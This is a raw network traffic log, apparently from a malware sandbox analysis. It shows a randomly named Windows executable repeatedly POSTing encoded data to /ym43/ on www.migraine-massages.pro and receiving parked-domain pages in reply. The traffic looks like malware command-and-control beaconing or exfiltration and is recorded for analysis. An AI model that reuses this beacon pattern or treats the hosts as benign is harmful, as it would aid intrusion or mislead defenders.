                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Security-Policy: default-src 'self'; script-src 'nonce-76218b420b474a8caea91096fd30ab60';
                                                                        Vary: Accept-Language
                                                                        Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 37 36 32 31 38 62 34 32 30 62 34 37 34 61 38 63 61 65 61 39 31 30 39 36 66 64 33 30 61 62 36 30 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                        Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-76218b420b474a8caea91096fd30ab60';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                        Nov 7, 2024 17:58:09.371654987 CET1236INData Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                        Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                        Nov 7, 2024 17:58:09.371665955 CET161INData Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                        Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>
                                                                        Nov 7, 2024 17:58:09.371670961 CET5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.749845199.59.243.227803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:14.664915085 CET670OUTPOST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 79 42 4d 4e 43 38 51 66 47 39 4a 77 43 75 55 33 7a 52 42 50 36 79 76 37 7a 6f 66 68 46 6e 70 43 6d 34 65 47 38 62 41 44 33 2b 31 41 6e 62 6e 4f 41 3d 3d
                                                                        Data Ascii: 7j=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CyBMNC8QfG9JwCuU3zRBP6yv7zofhFnpCm4eG8bAD3+1AnbnOA==
                                                                        Nov 7, 2024 17:58:15.275690079 CET1236INHTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:14 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: 7124d638-8c8d-474a-9e84-3babc42e9444
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=7124d638-8c8d-474a-9e84-3babc42e9444; expires=Thu, 07 Nov 2024 17:13:15 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:15.275796890 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzEyNGQ2MzgtOGM4ZC00NzRhLTllODQtM2JhYmM0MmU5NDQ0IiwicGFnZV90aW1lIjoxNzMwOTk4Nj


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.749846199.59.243.227803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:17.205637932 CET690OUTPOST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4b 55 2f 78 4d 70 32 6a 36 63 41 6e 38 47 4c 65 76 68 63 41 62 66 4e 31 36 6a 59 33 59 71 54 56 37 50 6b 43 54 56 65 74 33 43 76 4e 43 6c 62 35 51 3d
                                                                        Data Ascii: 7j=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrKU/xMp2j6cAn8GLevhcAbfN16jY3YqTV7PkCTVet3CvNClb5Q=
                                                                        Nov 7, 2024 17:58:17.884562016 CET1236INHTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:17 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: c071df37-5f77-4a96-aee0-3f424b1718a5
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=c071df37-5f77-4a96-aee0-3f424b1718a5; expires=Thu, 07 Nov 2024 17:13:17 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:17.884584904 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzA3MWRmMzctNWY3Ny00YTk2LWFlZTAtM2Y0MjRiMTcxOGE1IiwicGFnZV90aW1lIjoxNzMwOTk4Nj


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.749847199.59.243.227803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:19.752448082 CET1703OUTPOST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 69 35 53 4e 71 2b 37 39 42 6f 4a 33 54 53 70 61 42 41 75 4f 39 50 6e 65 52 43 6d 4d 47 43 4b 54 69 5a 5a 4a 55 6d 39 72 42 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 78 43 6c 4c 36 74 77 4f 71 73 4d 35 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 4f 33 78 6a 66 [TRUNCATED]
                                                                        Data Ascii: 7j=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb2xK9SOQ4i5SNq+79BoJ3TSpaBAuO9PneRCmMGCKTiZZJUm9rBrhSJfMwPGjas7eeW9IB67rnvg3qJ9p6/G8hgJFBZyyKyXY7rZituMkSVRlPyFIxClL6twOqsM5Ml7xjnJVrj49c94sijEmdDebgFSPEILfsSYOVBO3xjfbqvVgqILMV+XdNen1T2RAKwgO61cdKBGTtU6jKl3QmG+QBfkGD4JujR4lTc0z/tuIYBJx+9OF9tJROqczyQ4RQGuxVvKUyxdcUF3+iV+jUriPlw1EP9YkYcNmC57f/7TmAYd1wIQngAXcZCIEf8mOxidUZZoHoeySYreH9tXfijrpgmD2F8YEwhfMzCxOIWiPqgIGwps04Le6Au38UeDSyG79TH/InW6P3nWbPjVCWYBp3n3UW4EpAEz3Ck8oO8lXNxiYcgYhBxyFGG1yQ5CgWKO+90Dcb5wt0O5yMoucC4Q7KE0UYsarZvQTbEKYeGS9hRwNHoEuXe+iUfPvBz6I4fwhflTVvylJN1Vj/vOujTFgsLeNAAHrC56yGcuc5vkbIoDfXOM+J6onATtVvuqsdTwK0yrSHbDYlf/TkxFJO9PvnKuOJkRgMWkwKlcNZUDDut7NGnI1ipZWN/VDzdKxGiw86bxm/1ik4wfjRlw1EgaCAQ3+0gKocohnbOkBCKibNaOv7b6A1G8IRZA1eJm7NowZUaCxsELaAcEIaBh6fu2iZm6g5WzwYE9crocLHyMGdpgFlDT1iVT5RzQ2/jjTmMOdSCGwD2z2BNGYPVap0tp3Q3iYhqj8wcgBcUtvwfPGUQCAEQKSArSVldXaCFGrCETdph61SmpWJ [TRUNCATED]
                                                                        Nov 7, 2024 17:58:20.377840042 CET1236INHTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:20 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: 67a45118-5a19-42e1-a06b-c35908028457
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=67a45118-5a19-42e1-a06b-c35908028457; expires=Thu, 07 Nov 2024 17:13:20 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:20.377867937 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjdhNDUxMTgtNWExOS00MmUxLWEwNmItYzM1OTA4MDI4NDU3IiwicGFnZV90aW1lIjoxNzMwOTk4Nz


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.749848199.59.243.227803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:22.296019077 CET398OUTGET /ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:22.913733006 CET1236INHTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:22 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1534
                                                                        x-request-id: 3edce0ac-5d27-4c41-9e29-645b76387450
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XX3Wuet/YHW07LZrI2ABfV22QUkhVCHs0ezi8QDEmbpfeTSpa5Suh1bzJOp4a15opnxMHLb71LZ8a+rP+BAYXQ==
                                                                        set-cookie: parking_session=3edce0ac-5d27-4c41-9e29-645b76387450; expires=Thu, 07 Nov 2024 17:13:22 GMT; path=/
                                                                        connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 33 57 75 65 74 2f 59 48 57 30 37 4c 5a 72 49 32 41 42 66 56 32 32 51 55 6b 68 56 43 48 73 30 65 7a 69 38 51 44 45 6d 62 70 66 65 54 53 70 61 35 53 75 68 31 62 7a 4a 4f 70 34 61 31 35 6f 70 6e 78 4d 48 4c 62 37 31 4c 5a 38 61 2b 72 50 2b 42 41 59 58 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
